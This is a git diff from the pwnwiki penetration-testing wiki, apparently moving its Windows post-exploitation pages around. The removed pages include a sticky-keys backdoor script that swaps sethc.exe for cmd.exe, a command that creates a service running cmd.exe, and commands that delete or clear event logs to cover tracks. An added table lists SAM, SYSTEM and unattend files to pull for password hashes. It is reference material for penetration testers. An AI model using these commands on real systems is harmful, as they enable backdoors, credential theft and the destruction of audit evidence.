Merge pull request #56 from pwnwiki/fix_linking

Removed old persistance (with an a) dirs

persistance/windows/autostart.md

@@ -1,94 +0,0 @@
-## Windows Autostart Locations
-### Folders
-| Location | Operating System |
-| -------- | ---------------- |
-| `%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\` | Windows NT 6.0, 6.1 |
-| `%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\` | Windows 5.0, 5.1, 5.2 |
-| `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` | Windows 9x |
-| `%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\` | Windows NT 3.50, 3.51, 4.0 |
-| `User\Startup\` | |
-| `%windir%\Start Menu\Programs\Startup\` | |
-| `%windir%\Tasks\` | |
-| `%windir%\system\iosubsys\` | |
-| `%windir%\system\vmm32\` | |
-
-### Files
-| Location | Operating System |
-| -------- | ---------------- |
-| `%windir%\dosstart.bat` | |
-| `%windir%\system.ini` - [boot] "scrnsave.exe" | |
-| `%windir%\system.ini` - [boot] "shell" | |
-| `%windir%\system\autoexec.nt` | |
-| `%windir%\system\config.nt` | |
-| `%windir%\win.ini` - [windows] "load" | |
-| `%windir%\win.ini` - [windows] "run" | |
-| `%windir%\wininit.ini` | |
-| `%windir%\winstart.bat` | |
-| `c:\autoexec.bat` | |
-| `c:\config.sys` | |
-| `c:\explorer.exe` | |
-
-### Registry
-| Location | Function |
-| -------- | -------- |
-| `%windir%\dosstart.bat` | |
-| `HKEY_CLASSES_ROOT\batfile\shell\open\command\` | Executed whenever a .BAT file (Batch Command) is run. |
-| `HKEY_CLASSES_ROOT\comfile\shell\open\command\` | Executed whenever a .COM file (Command) is run. |
-| `HKEY_CLASSES_ROOT\exefile\shell\open\command\` | Executed whenever a .EXE file (Executable) is run. |
-| `HKEY_CLASSES_ROOT\jsefile\shell\open\command\` | Executed whenever a .JSE file (Encoded Javascript) is run. |
-| `HKEY_CLASSES_ROOT\jsfile\shell\open\command\` | Executed whenever a .JS file (Javascript) is run. |
-| `HKEY_CLASSES_ROOT\piffile\shell\open\command\` | Executed whenever a .PIF file (Portable Interchange Format) is run. |
-| `HKEY_CLASSES_ROOT\scrfile\shell\open\command\` | Executed whenever a .SCR file (Screen Saver) is run. |
-| `HKEY_CLASSES_ROOT\vbefile\shell\open\command\` | Executed whenever a .VBE file (Encoded Visual Basic Script) is run. |
-| `HKEY_CLASSES_ROOT\vbsfile\shell\open\command\` | Executed whenever a .VBS file (Visual Basic Script) is run. |
-| `HKEY_CLASSES_ROOT\wsffile\shell\open\command\` | Executed whenever a .WSF file (Windows Scripting File) is run. |
-| `HKEY_CLASSES_ROOT\wshfile\shell\open\command\` | Executed whenever a .WSH file (Windows Scripting Host) is run. |
-| `HKEY_CURRENT_USER\Control Panel\Desktop` | The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. |
-| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load` | Executed when the user logs in. |
-| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run` | Executed when the user logs in. |
-| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
-| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\` | Used only by Setup. Displays a progress dialog box as the keys are run one at a time. |
-| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
-| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\` | All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit` | Executed when a user logs in. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon` | The "Shell" value is monitored. This value is executed after you log in. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\` | All values in this key are executed as services, and then their autostart reference is deleted. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\` | All values in this key are executed as services. |
-| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\` | Executed by explorer.exe as soon as it has loaded. |
-| `HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline` | Executed when a 16-bit Windows executable is executed. |
-| `HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline` | Executed when a 16-bit DOS application is executed. |
-| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` | The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. |
-| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\` | All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. |
-| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\` | Layered Service Providers, executed before user login. |
-| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\` | Services marked to startup automatically are executed before user login. |
-| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | Similar to the RunOnce key from HKEY_CURRENT_USER. |
-| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\` | Similar to the Run key from HKEY_CURRENT_USER. |
-
-
-## Windows Operating System Versions
-From http://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx:
-
-The following table summarizes the most recent operating system version numbers.
-
-| Operating system | Version number |
-| ---------------- | -------------- |
-| Windows 8.1 | 6.3 |
-| Windows Server 2012 R2 | 6.3 |
-| Windows 8 | 6.2 |
-| Windows Server 2012 | 6.2 |
-| Windows 7 | 6.1 |
-| Windows Server 2008 R2 | 6.1 |
-| Windows Server 2008 | 6.0 |
-| Windows Vista | 6.0 |
-| Windows Server 2003 R2 | 5.2 |
-| Windows Server 2003 | 5.2 |
-| Windows XP 64-Bit Edition | 5.2 |
-| Windows XP | 5.1 |
-| Windows 2000 | 5.0 |
-
-## References
-A large portion of this content came from https://web.archive.org/web/20110203184210/http://www.easy-data.no/Autostart.html

persistance/windows/binary.md

@@ -1,11 +0,0 @@
-# Windows Binary Planting
-
-Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges.
-
-| Command | Description / Importance |
-| ------- | ------------------------ |
-| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. |
-| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 |
-| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. |
-| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. |
-|<code>Replacing file as: sethc.exe<br>@echo off <br>c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul <br>if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul <br>cmd %SYSTEMROOT%\System32\cmdsys\ > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul <br>copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul <br>copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul<br>exit</code> | By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |

persistance/windows/cover.md

@@ -1,74 +0,0 @@
-<!-- Code for collapse and expand -->
-<script type="text/javascript"> 
-$(document).ready(function() { 
-$('div.view').hide(); 
-$('div.slide').click(function() {
-$(this).next('div.view').slideToggle('fast'); 
-return false; 
-}); 
-}); 
-</script>
-
-# Windows Covering Tracks Commands
-
-Commands to run to clean up a system after you have exploited it and to reduce a target's ability to discover what you did while on their system and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
-
-## del
-### Delete Logs
- * **Command with arguments**: `del %WINDIR%\*.log /a /s /q /f`
- * **Description**: **MUST be run as an administrator**. Deletes all *.log files from the %WINDIR% directory.
- * **Output**:
-   * NA
-
-----
-
-## wevtutil
-### List Logs
- * **Command with arguments**: `wevutil el`
- * **Description**: Lists the different log files the system is keeping. More information can be found http://technet.microsoft.com/en-us/library/cc732848(WS.10).aspx
- * **Output**:
-   * <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>C:\Users\johndoe>wevtutil el
-Application
-DFS Replication
-Directory Service
-DNS Server
-File Replication Service
-HardwareEvents
-Internet Explorer
-Key Management Service
-Security
-System
-ThinPrint Diagnostics
-EndpointMapper
-ForwardedEvents
-Microsoft-Windows-ADSI/Debug
-Microsoft-Windows-Bits-Client/Analytic
-Microsoft-Windows-Bits-Client/Operational
-Microsoft-Windows-CAPI2/Operational
-Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational
-Microsoft-Windows-CodeIntegrity/Operational
-Microsoft-Windows-CodeIntegrity/Verbose
-Microsoft-Windows-COM/Analytic
-Microsoft-Windows-CorruptedFileRecovery-Client/Operational
-Microsoft-Windows-CorruptedFileRecovery-Server/Operational
-Microsoft-Windows-CredUI/Diagnostic
-Microsoft-Windows-DateTimeControlPanel/Analytic
-Microsoft-Windows-DateTimeControlPanel/Debug
-Microsoft-Windows-DateTimeControlPanel/Operational
-Microsoft-Windows-DCLocator/Debug
-Microsoft-Windows-Diagnosis-DPS/Analytic
-Microsoft-Windows-Diagnosis-DPS/Debug
-Microsoft-Windows-Diagnosis-DPS/Operational
-Microsoft-Windows-Diagnosis-MSDT/Debug
-Microsoft-Windows-Diagnosis-MSDT/Operational
-Microsoft-Windows-Diagnosis-PLA/Debug
-Microsoft-Windows-Diagnosis-PLA/Operational
-Microsoft-Windows-Diagnosis-WDI/Debug
-Microsoft-Windows-Diagnostics-Networking/Debug
-[...snip...]</code></div> 
-
-### Clear Logs
- * **Command with arguments**: `wevtutil cl [LOGNAME]`
- * **Description**: **MUST be run as an administrator**.  Clears the contents of a specific log.
- * **Output**:
-   * <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>c:\temp>wevtutil cl Microsoft-Windows-EventLog/Debug</code></div> 

presence/linux/index.md

@@ -0,0 +1,7 @@
+# Linux Presence Commands
+
+Command that can be executed from the context of a shell prompt that help gain insight into the configuration of the target.
+
+  * [Blind Files](blind.md) - Files to look for on the system.
+  * [Finding Files](find_files.md) - How to search for files.
+  * [Pillage List](pillage.lst) - Text file with one entry per line of important files to examine.

presence/osx/index.md

@@ -0,0 +1,6 @@
+# OSX Presence Commands
+
+Command that can be executed from the context of a shell prompt that help gain insight into the configuration of the target.
+
+  * [Blind Files](blind.md) - Files to look for on the system.
+  * [Finding Files](find_files.md) - How to search for files.

presence/windows/blind.md

@@ -12,3 +12,18 @@ The files below are things to pull when all you can do is to blindly read. Examp
 | `%SYSTEMROOT%\repair\SAM`<br>`%SYSTEMROOT%\System32\config\RegBack\SAM` | Stores user passwords in either an [LM hash](https://en.wikipedia.org/wiki/LM_hash) and/or an [NTLM hash](https://en.wikipedia.org/wiki/NTLM) format. The SAM file in \repair is locked, but can be retrieved using forensic or [Volume Shadow copy methods](http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1.html). |
 | `%SYSTEMROOT%\repair\system`<br>`%SYSTEMROOT%\System32\config\RegBack\system` | This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or [Volume Shadow copy methods](http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1.html). |
 | `%SYSTEMDRIVE%\autoexec.bat` | autoexec.bat is a startup script that executes at startup. As [Webopedia states](http://www.webopedia.com/TERM/A/autoexec_bat.html), “Stands for automatically executed batch file, the file that DOS automatically executes when a computer boots up. This is a convenient place to put commands you always want to execute at the beginning of a computing session. For example, you can set system parameters such as the date and time, and install memory-resident programs.” |
+| `%SYSTEMDRIVE%\pagefile.sys` | This file is used by the operating system when there is not enough RAM (memory) in the system. It is a large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size. |
+| `%SYSTEMROOT%\repair\SAM` <br> `%SYSTEMROOT%\System32\config\RegBack\SAM` | These files store the LM and NTLM hashes for local users.  Using [Volume Shadow Copy](http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1.html) or [Ninja Copy](http://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/) you can retrieve these files. |
+| `%SystemDrive%\inetpub\logs\LogFiles` | IIS 7.x web server log file location. |
+| `%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat` | Internet Explorer web browser history file (http://support.microsoft.com/kb/322916) |
+| `%USERPROFILE%\ntuser.dat` | User-level Windows registry settings (http://technet.microsoft.com/en-us/library/cc758618(v=WS.10).aspx) |
+| `%WINDIR%\System32\drivers\etc\hosts` | System hosts file for local translation of host names to IP addresses. |
+| `%WINDIR%\debug\NetSetup.log` | Shows issues when computers are joined to a domain. http://technet.microsoft.com/en-us/library/cc961817.aspx |
+| `%WINDIR%\iis[version].log` where [version] = 6, 7, or 8 | Internet Information Service (IIS web server) log files. |
+| `%WINDIR%\repair\sam`<br>`%WINDIR%\repair\system`<br>`%WINDIR%\repair\software`<br>`%WINDIR%\repair\security` | System registry hives. https://en.wikipedia.org/wiki/Windows_Registry |
+| `%WINDIR%\system32\CCM\logs\*.log` | Windows SCCM (System Center Configuration Manager) log files (http://technet.microsoft.com/en-us/library/bb892800.aspx) |
+| `%WINDIR%\system32\config\AppEvent.Evt`<br>`%WINDIR%\system32\config\SecEvent.Evt` | Windows Event Logs. |
+| `%WINDIR%\system32\config\default.sav`<br>`%WINDIR%\system32\config\security.sav`<br>`%WINDIR%\system32\config\software.sav`<br>`%WINDIR%\system32\config\system.sav` | Backup Windows registry files (http://forensics.wikia.com/wiki/Windows_registry_entries) |
+| `%WINDIR%\system32\logfiles\httperr\httperr1.log` | IIS 6.x web server error logs. |
+| `%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log` where YYMMDD = year month day | Web server log files. |
+| `unattend.txt, unattend.xml, sysprep.inf` | Used in the automated deployment of Windows images and can contain user accounts. |

presence/windows/files.md

@@ -1,21 +0,0 @@
-# Windows Important Files
-
-Files that can yield passwords or other intel about the system, network or users.
-
-| File     | Description / Importance |
-| -------- | ------------------------ |
-| `%SYSTEMDRIVE%\pagefile.sys` | This file is used by the operating system when there is not enough RAM (memory) in the system. It is a large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size. |
-| `%SYSTEMROOT%\repair\SAM` <br> `%SYSTEMROOT%\System32\config\RegBack\SAM` | These files store the LM and NTLM hashes for local users.  Using [Volume Shadow Copy](http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1.html) or [Ninja Copy](http://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/) you can retrieve these files. |
-| `%SystemDrive%\inetpub\logs\LogFiles` | IIS 7.x web server log file location. |
-| `%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat` | Internet Explorer web browser history file (http://support.microsoft.com/kb/322916) |
-| `%USERPROFILE%\ntuser.dat` | User-level Windows registry settings (http://technet.microsoft.com/en-us/library/cc758618(v=WS.10).aspx) |
-| `%WINDIR%\System32\drivers\etc\hosts` | System hosts file for local translation of host names to IP addresses. |
-| `%WINDIR%\debug\NetSetup.log` | Shows issues when computers are joined to a domain. http://technet.microsoft.com/en-us/library/cc961817.aspx |
-| `%WINDIR%\iis[version].log` where [version] = 6, 7, or 8 | Internet Information Service (IIS web server) log files. |
-| `%WINDIR%\repair\sam`<br>`%WINDIR%\repair\system`<br>`%WINDIR%\repair\software`<br>`%WINDIR%\repair\security` | System registry hives. https://en.wikipedia.org/wiki/Windows_Registry |
-| `%WINDIR%\system32\CCM\logs\*.log` | Windows SCCM (System Center Configuration Manager) log files (http://technet.microsoft.com/en-us/library/bb892800.aspx) |
-| `%WINDIR%\system32\config\AppEvent.Evt`<br>`%WINDIR%\system32\config\SecEvent.Evt` | Windows Event Logs. |
-| `%WINDIR%\system32\config\default.sav`<br>`%WINDIR%\system32\config\security.sav`<br>`%WINDIR%\system32\config\software.sav`<br>`%WINDIR%\system32\config\system.sav` | Backup Windows registry files (http://forensics.wikia.com/wiki/Windows_registry_entries) |
-| `%WINDIR%\system32\logfiles\httperr\httperr1.log` | IIS 6.x web server error logs. |
-| `%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log` where YYMMDD = year month day | Web server log files. |
-| `unattend.txt, unattend.xml, sysprep.inf` | Used in the automated deployment of Windows images and can contain user accounts. |

privesc/windows/index.md

@@ -0,0 +1,5 @@
+# Windows Privilege Escalation Commands
+
+Command that can be executed from the context of a shell prompt that help escalate or increase attacker privilege of the target.
+
+  * [UAC](uac.md) - How to bypass UAC.